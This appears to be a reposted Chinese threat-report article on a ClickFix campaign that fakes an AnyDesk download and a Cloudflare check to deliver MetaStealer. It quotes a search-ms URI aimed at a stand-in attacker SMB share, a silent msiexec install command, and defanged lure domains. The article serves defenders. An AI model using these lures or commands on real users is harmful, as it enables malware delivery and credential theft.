最近出现了 ClickFix 攻击的一种新变体,伪装成合法的 AnyDesk 安装程序来传播 MetaStealer 信息窃取程序。
该活动利用虚假的 Cloudflare Turnstile 验证页面来引诱受害者执行精心设计的 Windows 协议处理程序,最终提供伪装成 PDF 的恶意 MSI 包。
随着组织继续加强对传统社会工程技术的防御,威胁行为者正在改进他们的剧本,将熟悉的诱饵与意想不到的系统组件混合在一起,以绕过检测并窃取敏感凭据。
8月初,搜索AnyDesk远程访问工具的用户在anydeesk[.]ink/download/anydesk.html。 该页面显示的似乎是标准的 Cloudflare Turnstile 提示,并带有“验证您是人类”按钮。单击后,受害者不会像经典 ClickFix 攻击那样将命令粘贴到“运行”对话框中,而是通过 search-ms URI 处理程序重定向到 Windows 文件资源管理器中。
Huntress 研究人员指出,重定向机制的这种微妙转变利用了监控较少的 Windows 搜索协议,让安全团队措手不及。
当 search-ms URI 调用远程 SMB 共享时,感染链就会展开,将名为“自述文件Anydesk.pdf.lnk”的 Windows 快捷方式文件传送到受害者的系统。
与依赖剪贴板粘贴的 PowerShell 命令的 FileFix 变体不同,此攻击会自动启动 LNK 有效负载,LNK 有效负载又执行脚本来下载和安装两个组件:托管在 Microsoft Edge 上的正版 AnyDesk 安装程序以实现合理性,以及从 chat1[.]商店。
诱饵文件实际上是一个 MSI 包,它利用 %COMPUTERNAME% 环境变量将受害者的主机名动态合并到其下载 URL 中。下载后,MSI 将通过以下方式安装:-
msiexec /i "%TEMP%\%%COMPUTERNAME%%.msi" /quiet
此命令完成后,元数据会显示两个主要工件:负责编排设置的 CustomActionDLL 和包含ls26.exe、MetaStealer 植入器和清理脚本的 CAB 存档。
Huntress 分析师发现,ls26.exe受到 Private EXE Protector 的保护,并表现出 MetaStealer 的特征行为,包括从浏览器收集凭据和加密钱包盗窃。
感染机制
该活动的核心在于 Windows 搜索的巧妙使用。通过调用 search-ms URI 协议,攻击者绕过强化环境中的“运行”对话框限制,并直接通过文件资源管理器引入有效负载。
以下 URI 代码片段说明了重定向:-
search-ms:displayname=AnyDesk%20Secure%20Access;crumb=location:\\attacker-smb\share
用户确认文件资源管理器提示后,LNK 文件将以静默方式执行下载例程。然后,MSI 的 CustomActionDLL 触发 Binary.bz.WrappedSetupProgram 的检索,从而解压缩 ls26.exe 并1.js。
JavaScript 文件确保删除中间文件,而 ls26.exe 启动数据泄露阶段。
通过滥用合法的 Windows 协议和文件处理,这种攻击可以逃避沙箱检测和安全警报,直到最终有效负载释放其恶意逻辑。
这种新兴策略强调了监控可信系统功能的非常规扩展的重要性。
防御者应考虑实施严格的协议处理程序策略、SMB 审核和 MSI 安装的上下文分析,以检测和破坏这些复杂的社会工程活动。
版权声明
本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。


评论